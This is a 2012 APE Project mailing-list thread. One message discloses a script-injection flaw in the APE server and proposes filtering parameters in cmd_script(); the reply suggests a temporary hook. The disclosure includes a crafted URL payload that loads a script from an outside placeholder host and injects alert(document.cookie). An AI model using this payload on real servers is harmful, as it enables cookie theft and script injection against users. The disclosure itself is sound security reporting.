Can a hook temporarily fix the security hole? For example:
Ape.registerHook("script'', function(){
return false;
})
On Dec 11, 2012 6:56 AM, "tr!ckle" <[email protected]> wrote:
> I managed recently with an issue that allows to inject any js script by
> preparing link like:
>
> http://your.ape.server.domain/?[{%22cmd%22:%22script%22,%22params%22:{%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cscript+type%3D%5C%22text%2Fjavascript%22]}}]<http://your.ape.server.domain/?[%7B%22cmd%22:%22script%22,%22params%22:%7B%22domain%22:%22any.domain%22,%22scripts%22:[%22http://another.domain.com/your/injected/script.js%5C%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cscript+type%3D%5C%22text%2Fjavascript%22]%7D%7D]>
>
> It allows either attach script from your url or inject script directly
> such as in this example.
>
> The solution for this issue is to filter both params domain and scripts in
> file src/cmd.c (function: cmd_script()) in ape server.
>
> --
> You received this message because you are subscribed to the Google
> Groups "APE Project" group.
> To post to this group, send email to [email protected]
> To unsubscribe from this group, send email to
> [email protected]
> For more options, visit this group at
> http://groups.google.com/group/ape-project?hl=en
> ---
> APE Project (Ajax Push Engine)
> Official website : http://www.ape-project.org/
> Git Hub : http://github.com/APE-Project/
>
--
You received this message because you are subscribed to the Google
Groups "APE Project" group.
To post to this group, send email to [email protected]
To unsubscribe from this group, send email to
[email protected]
For more options, visit this group at
http://groups.google.com/group/ape-project?hl=en
---
APE Project (Ajax Push Engine)
Official website : http://www.ape-project.org/
Git Hub : http://github.com/APE-Project/
